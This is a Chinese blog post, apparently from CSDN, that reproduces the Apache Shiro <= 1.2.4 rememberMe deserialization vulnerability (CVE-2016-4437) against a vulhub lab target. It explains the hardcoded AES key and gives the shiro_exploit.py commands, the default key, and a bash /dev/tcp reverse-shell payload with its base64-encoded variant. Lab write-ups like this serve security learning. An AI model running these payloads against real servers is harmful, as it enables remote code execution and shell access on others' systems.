Shiro反序列化漏洞复现(CVE-2016-4437)

最新推荐文章于 2024-07-23 11:03:32 发布
最新推荐文章于 2024-07-23 11:03:32 发布
阅读量430 收藏 1
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125629183
版权

Shiro反序列化漏洞复现(CVE-2016-4437)

漏洞原理

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序可以推断出解密的顺序为获取cookie-base64解码-AES解密-反序列化。

AES加密的KEY值被硬编码在代码中,可以从源码中找到KEY值。攻击者可以构造恶意代码,将其序列化-AES加密-base64编码,最后作为cookie值得rememberMe字段发送,shiro将接收到的rememberMe字段进行解码-解密-反序列化,如果成功,则执行恶意代码,构成攻击。

参考:

https://www.cnblogs.com/peace-and-romance/p/15669560.html

影响版本

Apache Shiro <= 1.2.4

漏洞复现

环境:
docker下vulhub靶场

  1. 访问靶场
    在这里插入图片描述
  2. 看到remember me ,尝试登录,抓包。看到返回包里面有rememberMe=deleteMe字段,确定是该漏洞。
    在这里插入图片描述
  3. 用Shiro_exploit扫描,找到AES加密的key
python shiro_exploit.py -u http://192.168.2.163:8080

在这里插入图片描述
vulnerable为True 就证明存在反序列化漏洞

  1. 漏洞利用反弹shell
    构造反弹shell代码
    将下面代码base 64加密
bash -i >& /dev/tcp/192.168.2.160/5555 0>&1

构造到下面的语句中

bash -i >& /dev/tcp/192.168.2.160/5555 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTYwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

使用shiro_exploit.py进行利用

python shiro_exploit.py -t 3 -u http://192.168.2.137:8080 -p "bash加密命令" -k “密钥”

python shiro_exploit.py -t 3 -u http://192.168.2.137:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTYwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i} " -k "kPH+bIxk5D2deZiIxcaaaA=="

在这里插入图片描述
在这里插入图片描述
复现成功!

Day_0713
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
shiro反序列化复现.zip
08-03
Apache Shiro在过去的版本确实存在过这样的漏洞,例如CVE-2016-4437,攻击者可以利用此漏洞通过精心构造的序列化数据触发代码执行。 这个复现工具包可能包括以下内容: 1. **PoC(Proof of Concept)代码**:这...
end的python学习shiro检测
qq_45781155的博客
04-05 429
识别SHIRO框架: 请求包里面发送:RememberMe= 响应头里面出现cookie rememberme 代码检测是否使用SHIRO框架: import requests import urllib3 urllib3.disable_warnings() header={ 'cookie':'rememberMe=1' } def check_shiro(url): res=requests.get(url,verify=False,headers=header) if
python 孺子牛_SpringBoot 优雅的整合 Shiro
weixin_39524247的博客
12-23 247
Apache Shiro是一个功能强大且易于使用的Java安全框架,可执行身份验证,授权,加密和会话管理。借助Shiro易于理解的API,您可以快速轻松地保护任何应用程序 - 从最小的移动应用程序到最大的Web和企业应用程序。网上找到大部分文章都是以前SpringMVC下的整合方式,很多人都不知道shiro提供了官方的starter可以方便地跟SpringBoot整合。请看shiro官网关于spr...
Java实现Js crypto-js加密
最新发布
putMap的博客
07-23 267
AES/DES对称加密(RSA非对称加密)
shrio反序列化--漏洞复现
DM_LL的博客
06-12 693
shrio反序列化--漏洞复现
shiro反序列化漏洞原理分析及漏洞复现(Shiro-550/Shiro-721反序列化)
rumil的博客
09-18 1842
shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥硬编码shiro源码,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。特征:cookie含有rememberMe字段修复建议:更新shiro到1.2.4以上的版本。不使用默认的加密密钥,改为随机生成密钥
shiro反序列化漏洞学习(工具+原理+复现
热门推荐
qq_49849300的博客
03-10 1万+
由于shiro反序列化需要用到AES加密,而该加密方法的密钥是加解密一致的,所以我们使用shiro反序列化时,AES加密的密钥必须跟服务器一致,所以经常需要盲猜服务器的密钥,好在java开发们一般都不会去修改它,而且常常直接copy论坛和github上的代码,所以可以大量收集各种密钥,然后遍历来完成反序列化漏洞利用。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化。"方法,Base64.decode()的字符串就是shiro密钥,要确保该密钥安全性,千万不要使用公开的密钥
一道shiro反序列化转型引发的思考 .pdf
09-05
在这个特定的案例,虽然版本号为1.5.3的Shiro并不包含已知的RememberMe反序列化漏洞,但存在CVE-2020-13933权限绕过漏洞,这给攻击者提供了可乘之机。 权限绕过漏洞通常发生在认证和授权机制上,使得攻击者可以绕...
Apache-Shiro反序列化1
08-03
然而,在 Apache Shiro 存在一个严重的反序列化漏洞CVE-2016-4437,攻击者可以利用该漏洞在服务器上执行恶意命令。 一、漏洞成因 Apache Shiro反序列化机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意...
ShiroExploit.V2.3.zip
03-03
Apache Shiro在过去的版本就存在这样的反序列化漏洞,例如CVE-2016-10087。 ShiroExploit工具的使用通常包括以下几个步骤: 1. **环境准备**:确保你有一个运行Java的环境,因为ShiroExploit是基于Java编写的。 2...
shiro_tool.zip
11-18
https://blog.csdn.net/xixiyuguang/article/details/109744942
Shiro入门
_夜渐凉
07-12 454
本篇内容大多总结自张开涛的《跟我学Shiro》原文地址:http://jinnianshilongnian.iteye.com/blog/2018936 我并没有全部看完,只是选择了一部分对我来说急需在项目使用的知识加以学习。并且对于大多数第一次接触Shiro的同学来说,掌握这些也应该足够了。 一、架构 要学习如何使用Shiro必须先从它的架构谈起,作为一款安全框架Shiro的设计相当精妙...
Shiro 安全框架 1(基本认识)
这里的分享,都是干货
01-12 478
文章目录1、shiro简介2、关键对象2.1、认证的关键对象 1、shiro简介 Apache Shiro 是 Java 的一个安全框架。可以进行用户认证、授权。 认证:确定用户是否具有访问系统的权限。(用户登陆) 授权:对认证通过的用户,确认哪些资源有权限访问。(用户权限) 官方文档:http://shiro.apache.org/documentation.html 文文档:https://www.w3cschool.cn/shiro/co4m1if2.html 2、关键对象 2.1、认证的关键
shiro反序列化漏洞
qq_41696518的博客
06-27 1513
在请求包的Cookie为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 生成rememberMe。
Shiro RememberMe 反序列化漏洞
hbxf_xs的博客
11-27 2038
Apache Shiro 反序列化漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作(未作
Shiro RememberMe反序列化漏洞复现Shiro-550)
box
11-28 5068
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类将cookierememberMe字段内容分别进行 : 序列化 =>AES加密 =>Base64编码操作 在识别身份
解决方案-秘钥硬编码-入门渗透入门教程
程序员六七的博客
05-12 511
背景APP需要保存一些用户的个人信息到本地,比如:手机号、身份证、盐之类的,按要求不得明文存储。在早期方案使用AES进行加解密,密钥拆分成几个部分
每天一个漏洞之——shiro反序列化
qq_54030686的博客
01-23 2260
每天一个漏洞之——shiro反序列化 原因:Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。这个AES解密类似于md5加密过程使用的盐,简单的理解为这个shiro框架泄露了相应的AES密钥 出现的标志:返回数据包出现rememberMe=deleteme字样,说明此系统使用的为shiro框架,即可使用对应的工具
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞。攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值